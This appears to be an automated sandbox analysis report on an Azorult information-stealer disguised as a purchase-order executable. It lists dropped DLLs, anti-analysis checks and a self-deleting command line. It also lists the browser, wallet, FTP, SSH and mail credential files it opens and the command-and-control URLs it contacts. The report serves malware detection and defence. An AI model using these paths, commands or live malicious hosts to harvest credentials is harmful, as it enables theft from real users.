Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Code function: 1_2_0412040B rdtsc

1_2_0412040B

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_00402862 FindFirstFileW,	1_2_00402862
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_004066F3 FindFirstFileW,FindClose,	1_2_004066F3
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405ABE

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	API call chain: ExitProcess graph end node			graph_1-11345
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	API call chain: ExitProcess graph end node			graph_1-11189

Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: PO No. 3200005919.exe, 00000005.00000002.7238680594.0000000001796000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7239278080.00000000017E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Code function: 1_2_0412040B rdtsc

1_2_0412040B

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412C48A mov eax, dword ptr fs:[00000030h]	1_2_0412C48A
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04140F30 mov eax, dword ptr fs:[00000030h]	1_2_04140F30
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041432EB mov eax, dword ptr fs:[00000030h]	1_2_041432EB

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Code function: 1_2_04140F4D LdrLoadDll,

1_2_04140F4D

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

1_2_00403489

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets\
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets\
Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	1 Credentials In Files	1 Process Discovery	SMB/Windows Admin Shares	4 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	26 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO No. 3200005919.exe	62%	ReversingLabs	Win32.Trojan.Leonem
PO No. 3200005919.exe	47%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll	0%	ReversingLabs
C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll	0%	ReversingLabs
C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
montevivo.es	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://mozilla.org0	0%	Avira URL Cloud	safe
http://montevivo.es/lPkFJXszrxOMoP0.hhp	0%	Avira URL Cloud	safe
http://dbxo2.shop/dbx2/index.php	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	Avira URL Cloud	safe
http://dbxo2.shop/dbx2/index.php?	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
montevivo.es	86.109.170.4	true	false	0%, Virustotal, Browse	unknown
dbxo2.shop	104.21.2.6	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://montevivo.es/lPkFJXszrxOMoP0.hhp	false	Avira URL Cloud: safe	unknown
http://dbxo2.shop/dbx2/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.5.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	PO No. 3200005919.exe	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 